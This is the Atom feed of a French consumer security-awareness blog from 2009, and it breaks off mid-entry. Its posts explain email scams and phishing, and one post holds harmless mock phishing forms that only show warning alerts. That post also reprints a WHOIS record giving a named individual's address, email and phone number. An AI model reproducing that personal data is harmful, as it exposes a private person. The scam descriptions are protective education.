<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-8741137099428742325</id><updated>2012-02-16T12:53:25.100-08:00</updated><category term='Phishing'/><category term='Définition Virus'/><category term='Script'/><category term='Rootkit'/><category term='Le Mail Bombarding'/><category term='Downloader'/><category term='Méthodes de diffusion d&apos;un parasite'/><category term='Cheval de Troie? Trojan?'/><category term='Binder'/><category term='Le Freezer'/><category term='Fichiers à risque'/><category term='Le RAT'/><category term='-Classement des Pirates-'/><category term='ToolBar'/><category term='Arnaques par mail'/><category term='Hijack'/><category term='Le Backdoor'/><category term='Le Dropper'/><category term='Le Keylogger'/><category term='Vers'/><category term='Spyware'/><category term='Adwares'/><category term='Scanner de ports'/><category term='Le Trojan'/><title type='text'>Le Savoir est une arme</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://le-savoir-est-une-arme.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Le PHENIX</name><uri>http://www.blogger.com/profile/10082371022971256171</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_myG8IURVG2Y/SaRLJczhNII/AAAAAAAAAAM/lXISYq93EHw/S220/PhenixTV.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>37</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-8741137099428742325.post-2082874731339499951</id><published>2009-06-17T06:21:00.000-07:00</published><updated>2009-06-17T06:37:51.256-07:00</updated><title type='text'>Les conseils</title><content type='html'>&lt;div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div&gt;&lt;a href="http://3.bp.blogspot.com/_myG8IURVG2Y/SjjuDu8-NEI/AAAAAAAAADk/9NxjXeAUVb8/s1600-h/Danger%2520Internet%5B1%5D.jpg"&gt;&lt;img style="MARGIN: 0px 10px 10px 0px; WIDTH: 200px; FLOAT: left; HEIGHT: 143px; CURSOR: hand" id="BLOGGER_PHOTO_ID_5348286305413248066" border="0" alt="" src="http://3.bp.blogspot.com/_myG8IURVG2Y/SjjuDu8-NEI/AAAAAAAAADk/9NxjXeAUVb8/s200/Danger%2520Internet%5B1%5D.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#ff0000;"&gt;Comprendre l'informatique et ses dangers...Pour mieux se protéger.&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#ff0000;"&gt;Bon à savoir&lt;/span&gt; &lt;a href="http://4.bp.blogspot.com/_myG8IURVG2Y/SjjwgqIr68I/AAAAAAAAAD0/rl3ikkXlFj0/s1600-h/how-to-create-hack-proof-passwords%5B1%5D.jpg"&gt;&lt;img style="MARGIN: 0px 0px 10px 10px; WIDTH: 200px; FLOAT: right; HEIGHT: 130px; CURSOR: hand" id="BLOGGER_PHOTO_ID_5348289001359666114" border="0" alt="" src="http://4.bp.blogspot.com/_myG8IURVG2Y/SjjwgqIr68I/AAAAAAAAAD0/rl3ikkXlFj0/s200/how-to-create-hack-proof-passwords%5B1%5D.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#33ccff;"&gt;Il est conseillé d’avoir deux adresses e-mail&lt;/span&gt; : la première réservée à la famille et aux amis, la seconde dite “poubelle” dédiée aux jeux concours et aux inscriptions sur les forums. Vous verrez rapidement la seconde adresse se remplir de spam, scam, et autres courriels indésirables.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#33ccff;"&gt;Ne mettez jamais votre adresse e-mail sur les forums&lt;/span&gt; ou dans les commentaires des blogs. Des logiciels robots scrutent la toilent pour collecter les e-mails et envoyer ensuite des spams, virus, etc.&lt;br /&gt;&lt;br /&gt;N’ouvrez jamais les fichiers joints quand vous ne connaissez pas l’expéditeur ou si vous avez un doute sur celui-ci.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#33ccff;"&gt;Ne communiquez jamais votre numéro de compte bancaire par mail&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;Ne transférez pas les mails vous invitant à transférer le message à 10 personnes pour gagner un cadeau.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#33ccff;"&gt;Vérifiez s’il s’agit d’un hoax&lt;/span&gt; (&lt;span style="color:#ffffff;"&gt;rumeur&lt;/span&gt;) sur &lt;/strong&gt;&lt;a href="http://www.hoaxbuster.com/" target="_blank"&gt;&lt;strong&gt;Hoaxbuster&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt; ou &lt;/strong&gt;&lt;a href="http://www.hoaxkiller.fr/" target="_blank"&gt;&lt;strong&gt;HoaxKiller&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt; .&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; WIDTH: 320px; DISPLAY: block; HEIGHT: 242px; CURSOR: hand" id="BLOGGER_PHOTO_ID_5348287631306172514" border="0" alt="" src="http://4.bp.blogspot.com/_myG8IURVG2Y/SjjvQ6SeqGI/AAAAAAAAADs/GnFsRv3xnEQ/s320/cameras%5B1%5D.jpg" /&gt;&lt;/strong&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8741137099428742325-2082874731339499951?l=le-savoir-est-une-arme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://le-savoir-est-une-arme.blogspot.com/feeds/2082874731339499951/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2009/06/les-conseils.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/2082874731339499951'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/2082874731339499951'/><link rel='alternate' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2009/06/les-conseils.html' title='Les conseils'/><author><name>Le PHENIX</name><uri>http://www.blogger.com/profile/10082371022971256171</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_myG8IURVG2Y/SaRLJczhNII/AAAAAAAAAAM/lXISYq93EHw/S220/PhenixTV.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_myG8IURVG2Y/SjjuDu8-NEI/AAAAAAAAADk/9NxjXeAUVb8/s72-c/Danger%2520Internet%5B1%5D.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8741137099428742325.post-520928043091834454</id><published>2009-06-17T06:10:00.000-07:00</published><updated>2009-06-17T06:17:24.113-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Arnaques par mail'/><title type='text'>Arnaques par mail 4</title><content type='html'>&lt;strong&gt;&lt;span style="font-size:130%;color:#ff0000;"&gt;Arnaques par mail, comment éviter les pièges ?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#cc0000;"&gt;L’arnaque à la banque : le phishing&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Vous recevez un mail censé provenir de votre banque : même logo, adresse-mail correspondant à celle de votre banque, etc. &lt;span style="color:#ffffff;"&gt;Le message vous invite à vous connecter en cliquant sur un lien et mettre à jour votre compte en remplissant vos n° de compte et mot de passe.&lt;/span&gt; &lt;span style="color:#ff0000;"&gt;Attention arnaque !&lt;/span&gt; Votre banque ne vous enverra jamais ce type de mail.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#ffffff;"&gt;Si vous cliquez sur le lien, vous serez dirigé vers un site ressemblant étrangement au site de votre banque.&lt;br /&gt;&lt;/span&gt;Mais en regardant l’adresse du site, on remarque que nous ne sommes pas sur le site de la banque. &lt;span style="color:#ffffff;"&gt;L’objectif du phishing est de récupérer vos codes d’accès et votre mot de passe pour ensuite vider vos comptes bancaires.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#cc0000;"&gt;Comment se protéger du phishing ?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#ffffff;"&gt;Ne jamais cliquer sur les liens présents dans les mails censés provenir de votre banque.&lt;br /&gt;Votre banque ne vous demandera jamais de mettre à jour vos données en vous envoyant un simple mail.&lt;br /&gt;&lt;/span&gt;L’adresse internet des banques est sécurisée. Vous pouvez le vérifier facilement car elle commence par &lt;span style="color:#ffffff;"&gt;“https”&lt;/span&gt; et un &lt;span style="color:#ffffff;"&gt;cadenas apparaît à droite de l’adresse.&lt;/span&gt;&lt;br /&gt;Internet Explorer 7 et 8 intègrent une fonction anti-phishing. Vérifiez que cette fonctionnalité est bien active (Outils &gt; Options Internet &gt; onglet Avancés &gt; rubrique Sécurité &gt; cochez “Filtre anti-hameçonnage - Activer la vérification automatique de sites web”).&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#ffffff;"&gt;Ce type de mails touche aussi Paypal, Ebay, Orange, SNCF, Free… Retrouvez la liste des tentatives de phishing sur le site de&lt;/span&gt; &lt;/strong&gt;&lt;a href="http://www.secuser.com/phishing/index.htm" target="_blank"&gt;&lt;strong&gt;Secuser.com&lt;/strong&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8741137099428742325-520928043091834454?l=le-savoir-est-une-arme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://le-savoir-est-une-arme.blogspot.com/feeds/520928043091834454/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2009/06/arnaques-par-mail-4.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/520928043091834454'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/520928043091834454'/><link rel='alternate' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2009/06/arnaques-par-mail-4.html' title='Arnaques par mail 4'/><author><name>Le PHENIX</name><uri>http://www.blogger.com/profile/10082371022971256171</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_myG8IURVG2Y/SaRLJczhNII/AAAAAAAAAAM/lXISYq93EHw/S220/PhenixTV.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8741137099428742325.post-6313164868087779119</id><published>2009-06-17T06:06:00.000-07:00</published><updated>2009-06-17T06:10:26.516-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Arnaques par mail'/><title type='text'>Arnaques par mail 3</title><content type='html'>&lt;strong&gt;&lt;span style="font-size:130%;color:#ff0000;"&gt;Arnaques par mail, comment éviter les pièges ?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#cc0000;"&gt;L’arnaque à la loterie&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#ffffff;"&gt;Vous avez gagnez le gros lot à la loterie ! Sauf que vous ne vous êtes inscrit à aucune loterie&lt;/span&gt; et que pour toucher le jackpot vous devez juste répondre au mail. &lt;span style="color:#ff0000;"&gt;Attention arnaque !&lt;/span&gt; Tout comme l’arnaque africaine, il s’agit de vous soutirez de l’argent. &lt;span style="color:#ffffff;"&gt;Pour recevoir votre gain, votre interlocuteur vous demandera de verser quelques centaines d’euros&lt;/span&gt; (qui sont censés vous en rapporter beaucoup plus !).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#cc0000;"&gt;Comment se protéger de l’arnaque à la loterie ?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Ne répondez pas aux messages censés provenir de National Lotto Competition, Mega Lottery International ou encore Lotteria La primitiva…&lt;br /&gt;Supprimez de suite ces messages et, si possible, ajoutez l’expéditeur à votre liste de spam.&lt;br /&gt;&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8741137099428742325-6313164868087779119?l=le-savoir-est-une-arme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://le-savoir-est-une-arme.blogspot.com/feeds/6313164868087779119/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2009/06/arnaques-par-mail-3.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/6313164868087779119'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/6313164868087779119'/><link rel='alternate' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2009/06/arnaques-par-mail-3.html' title='Arnaques par mail 3'/><author><name>Le PHENIX</name><uri>http://www.blogger.com/profile/10082371022971256171</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_myG8IURVG2Y/SaRLJczhNII/AAAAAAAAAAM/lXISYq93EHw/S220/PhenixTV.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8741137099428742325.post-7313804934479231891</id><published>2009-06-17T06:01:00.000-07:00</published><updated>2009-06-17T06:06:20.838-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Arnaques par mail'/><title type='text'>Arnaques par mail 2</title><content type='html'>&lt;strong&gt;&lt;span style="font-size:130%;color:#ff0000;"&gt;Arnaques par mail, comment éviter les pièges ?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#cc0000;"&gt;L’arnaque aux petites annonces&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Alors que fleurissent les sites de petites annonces entre particuliers, une nouvelle arnaque voit le jour. &lt;span style="color:#ffffff;"&gt;Une personne vous contacte suite à une annonce que vous avez déposée&lt;/span&gt; (un tableau à 1 000€ par exemple). Elle se dit très intéressée, prend vos coordonnées &lt;span style="color:#ffffff;"&gt;et vous envoie un chèque d’un montant très supérieur a celui du bien vendu&lt;/span&gt; (8 000€). Elle vous dit d’encaisser le chèque (émis depuis l’étranger) et de lui renvoyer ensuite la différence. &lt;span style="color:#ff0000;"&gt;Attention arnaque !&lt;/span&gt; Le gros montant de ce chèque est censé vous rassurer quant au sérieux de l’acheteur. D’autant plus qu’en déposant le chèque en banque, vous êtes effectivement crédité de 8 000€. Honnête jusqu’au bout, vous remboursez les 7 000 euros trop perçus à l’acheteur. Mais voilà qu’un mois plus tard, votre banquier vous appelle pour vous dire que le chèque encaissé n’est pas valable et que le crédit de 8 000 euros est donc annulé. Par contre le chèque de 7 000 euros remis à l’acheteur est lui tout à fait valable. Vous avez été victime d’une arnaque aux petites annonces !&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#cc0000;"&gt;Comment se protéger des arnaques aux petites annonces ?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#ffffff;"&gt;Si un acheteur vous propose de vous verser un chèque d’un montant supérieur à celui du prix de l’objet vendu, dites-vous bien qu’il y a anguille sous roche.&lt;/span&gt; Ne répondez pas au soit disant acheteur et signalez son intention au site sur lequel vous venez de mettre en vente votre objet.&lt;br /&gt;Evitez, si possible, les acheteurs situés à l’étranger. Les lenteurs administratives facilitent les escroqueries et il vous sera difficile, voire impossible, de retrouver un jour les traces du pseudo-acheteur.&lt;br /&gt;&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8741137099428742325-7313804934479231891?l=le-savoir-est-une-arme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://le-savoir-est-une-arme.blogspot.com/feeds/7313804934479231891/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2009/06/arnaques-par-mail-2.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/7313804934479231891'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/7313804934479231891'/><link rel='alternate' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2009/06/arnaques-par-mail-2.html' title='Arnaques par mail 2'/><author><name>Le PHENIX</name><uri>http://www.blogger.com/profile/10082371022971256171</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_myG8IURVG2Y/SaRLJczhNII/AAAAAAAAAAM/lXISYq93EHw/S220/PhenixTV.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8741137099428742325.post-4788050586815025329</id><published>2009-06-17T05:44:00.000-07:00</published><updated>2009-06-17T06:06:57.393-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Arnaques par mail'/><title type='text'>Arnaques par mail 1</title><content type='html'>&lt;strong&gt;&lt;span style="font-size:130%;color:#ff0000;"&gt;Arnaques par mail, comment éviter les pièges ?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#cc0000;"&gt;L’arnaque africaine : le scam&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#ffffff;"&gt;« Ma grand-tante au Niger m’a légué 1 million d’euros. Mais pour toucher l’héritage, j’ai besoin de vous ! Si vous m’aidez, je partagerai avec vous cet argent».&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Qui n’a jamais reçu de scam (ruse) de ce genre ? Une personne vous invite à la contacter pour partager une rondelette somme d’argent. Pour cela, elle vous demande de répondre à son mail. &lt;span style="color:#ff0000;"&gt;Attention arnaque !&lt;/span&gt; Ce type de message vise à vous extorquer des fonds. Si vous répondez au mail, votre correspondant vous enverra des faux documents pour tenter de prouver la véracité de l’histoire et vous soutirer de l’argent pour payer les frais de notaire, de douane, de banque.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#cc0000;"&gt;Comment se protéger du scam ?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Ne répondez jamais aux sollicitations financières de personnes que vous ne connaissez pas.&lt;br /&gt;Ne prenez pas le temps de répondre à ce type de mail et, si votre boite mail le permet, bloquez l’expéditeur ou ajoutez son mail dans la liste de spammeurs&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Quelques exemples d’arnaques africaines sur &lt;/strong&gt;&lt;a href="http://www.afrik.com/article5431.html" target="_blank"&gt;&lt;strong&gt;Afrik.com&lt;/strong&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8741137099428742325-4788050586815025329?l=le-savoir-est-une-arme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://le-savoir-est-une-arme.blogspot.com/feeds/4788050586815025329/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2009/06/arnaques-par-mail-1.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/4788050586815025329'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/4788050586815025329'/><link rel='alternate' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2009/06/arnaques-par-mail-1.html' title='Arnaques par mail 1'/><author><name>Le PHENIX</name><uri>http://www.blogger.com/profile/10082371022971256171</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_myG8IURVG2Y/SaRLJczhNII/AAAAAAAAAAM/lXISYq93EHw/S220/PhenixTV.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8741137099428742325.post-7128387501389646730</id><published>2009-05-26T10:16:00.000-07:00</published><updated>2009-05-26T10:58:49.163-07:00</updated><title type='text'>Arnaque MSN</title><content type='html'>&lt;strong&gt;&lt;span style="color:#ffffff;"&gt;Après avoir reçu début 2007 des messages me proposant de savoir qui m'avait bloqué sur MSN ( évidement c'était une belle arnaque ) provenant de sites tels que quimeefface.com, checkmessenger.com, bloquo.com, blockoo.com, quienteadmite.com, etc... J'ai à nouveau reçu un message me proposant une solution miracle pour connaître quel contacte me bloque sur MSN :&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Login&lt;/strong&gt; - &lt;strong&gt;Mot de passe&lt;/strong&gt;&lt;br /&gt;&lt;input  name="login" style="font-size:20px;"&gt; &lt;input  name="mot de passe" style="font-size:20px;"&gt; &lt;input onclick="alert('Ne donnez jamais votre mot de passe!!!')" value="Vérifier" type="button" name="nom"&gt;&lt;br /&gt;&lt;strong&gt;__________________________________________________________________________&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#3333ff;"&gt;25 Mai 2009&lt;/span&gt;&lt;br /&gt;je sais enfin qui me bloque sur MSN&lt;br /&gt;&lt;br /&gt;Salut,&lt;br /&gt;j ai trouvé un site de tchat ou tu peux voir qui t a bloqué sur msn&lt;br /&gt;c est &lt;/strong&gt;&lt;a href="http://www.testomsn.com/"&gt;&lt;strong&gt;http://www.testomsn.com/&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt;&lt;br /&gt;fais un test tu verras qui te bloque sans que tu le saches , en plus y a un tchat&lt;br /&gt;a+&lt;br /&gt;&lt;br /&gt;__________________________________________________________________________&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Bon même si le phénomène est bien connu je tenais à mettre en garde les plus jeunes.&lt;br /&gt;Ne cliquez jamais sur ces liens, demandez vous toujours quel est l'intérêt de ces sites....Voler votre boite mail, spamer le web, faire de la pub, faire du phishing?&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#000099;"&gt;Le whois donne ceci :&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Registrant:&lt;br /&gt;zack stendl&lt;br /&gt;136 les danaides&lt;br /&gt;toulouse, france 31000&lt;br /&gt;France&lt;br /&gt;&lt;br /&gt;Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)&lt;br /&gt;Domain Name: TESTOMSN.COM&lt;br /&gt;Created on: 14-May-09&lt;br /&gt;Expires on: 14-May-10&lt;br /&gt;Last Updated on: 14-May-09&lt;br /&gt;&lt;br /&gt;Administrative Contact:&lt;br /&gt;stendl, zack lynxblanc@hotmail.com&lt;br /&gt;136 les danaides&lt;br /&gt;toulouse, france 31000&lt;br /&gt;France&lt;br /&gt;(066) 743-8800 Fax --&lt;br /&gt;&lt;br /&gt;Technical Contact:&lt;br /&gt;stendl, zack lynxblanc@hotmail.com&lt;br /&gt;136 les danaides&lt;br /&gt;toulouse, france 31000&lt;br /&gt;France&lt;br /&gt;(066) 743-8800 Fax --&lt;br /&gt;&lt;br /&gt;Domain servers in listed order:&lt;br /&gt;NS35.DOMAINCONTROL.COM&lt;br /&gt;NS36.DOMAINCONTROL.COM&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ce site ( &lt;/strong&gt;&lt;a href="http://www.testomsn.com/"&gt;&lt;strong&gt;www.testomsn.com&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt; ) a également un clone &lt;/strong&gt;&lt;a href="http://www.coco.fr/"&gt;&lt;strong&gt;http://www.coco.fr/&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Si l'un de vos contacte MSN c'est fait avoir, quelqu'un a modifié votre pseudo MSN ou que vous avez été spamé par ce type de messages. Prévenez votre contacte que sa boite mail a été infectée.&lt;br /&gt;Si vous étés tombés dans le piège, tous vos contactes MSN aurons étés spamés via votre boite mail. Prévenez les de ne pas cliquer sur le lien, modifiez votre mot de passe, si vous avez Messenger Plus Live il est préférable d'exporter votre liste de contactes MSN, de créer une nouvelle boite mail et de faire une analyse anti virus et Malwarebytes.&lt;br /&gt;&lt;br /&gt;Dernier conseil, "&lt;span style="color:#cc0000;"&gt;ne donnez jamais votre mot de passe&lt;/span&gt;".&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#000099;"&gt;Posez vous toujours les bonnes questions&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div&gt;&lt;strong&gt;&lt;span style="color:#ff0000;"&gt;&lt;span style="font-size:130%;color:#ff0000;"&gt;Félicitation !&lt;/span&gt;&lt;br /&gt;vous avez &lt;span style="color:#ffffff;"&gt;"peut être"&lt;/span&gt; gagné un trombone !&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_myG8IURVG2Y/ShwnCCPmISI/AAAAAAAAADM/om_y3TtSuYc/s1600-h/kyle-trombone_rouge-2%5B1%5D.jpg"&gt;&lt;img style="WIDTH: 200px; HEIGHT: 134px; CURSOR: hand" id="BLOGGER_PHOTO_ID_5340186174070071586" border="0" alt="" src="http://1.bp.blogspot.com/_myG8IURVG2Y/ShwnCCPmISI/AAAAAAAAADM/om_y3TtSuYc/s200/kyle-trombone_rouge-2%5B1%5D.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;span style="color:#ffffff;"&gt;Pour le savoir veuillez remplire ce formulaire :&lt;/span&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;&lt;br /&gt;&lt;span style="font-family:georgia;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;strong&gt;&lt;span style="color:#000099;"&gt;Type de carte :&lt;/span&gt;&lt;/strong&gt; &lt;select size="1" name="nom"&gt;&lt;option&gt;Sélectionnez...&lt;option&gt;Carte bleue&lt;option&gt;Carte Visa&lt;option&gt;Carte Eurocard&lt;option&gt;Carte Mastercard&lt;option&gt;American Express&lt;/option&gt;&lt;/select&gt;&lt;br /&gt;&lt;span style="color:#000099;"&gt;&lt;strong&gt;N° de carte :&lt;/strong&gt;&lt;/span&gt; &lt;input name="nom"&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#000099;"&gt;Date d'expiration :&lt;/span&gt;&lt;/strong&gt; &lt;select size="1" name="nom"&gt; &lt;option&gt;Mois&lt;option&gt;1&lt;option&gt;2&lt;option&gt;3&lt;option&gt;4&lt;option&gt;5&lt;option&gt;6&lt;option&gt;7&lt;option&gt;8&lt;option&gt;9&lt;option&gt;10&lt;option&gt;11&lt;option&gt;12&lt;/option&gt;&lt;/select&gt; / &lt;select size="1" name="nom"&gt;&lt;option&gt;Année&lt;option&gt;2008&lt;option&gt;2009&lt;option&gt;2010&lt;option&gt;2011&lt;option&gt;2012&lt;option&gt;2013&lt;option&gt;2014&lt;option&gt;2015&lt;option&gt;2016&lt;option&gt;2017&lt;option&gt;2018&lt;/option&gt;&lt;/select&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#000099;"&gt;Trois derniers chiffres de la zone de signature :&lt;/span&gt;&lt;/strong&gt; &lt;input size="1" name="nom"&gt;&lt;br /&gt;&lt;br /&gt;&lt;form&gt;&lt;br /&gt;&lt;input onclick="alert('Félicitation vous avez gagné le trombone !')" value="^^à moi les pépètes^^" type="button" name="nom"&gt;&lt;br /&gt;&lt;/form&gt;&lt;/p&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8741137099428742325-7128387501389646730?l=le-savoir-est-une-arme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://le-savoir-est-une-arme.blogspot.com/feeds/7128387501389646730/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2009/05/type-de-carte-selectionnez.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/7128387501389646730'/><link rel='self' type='application/atom+xml' 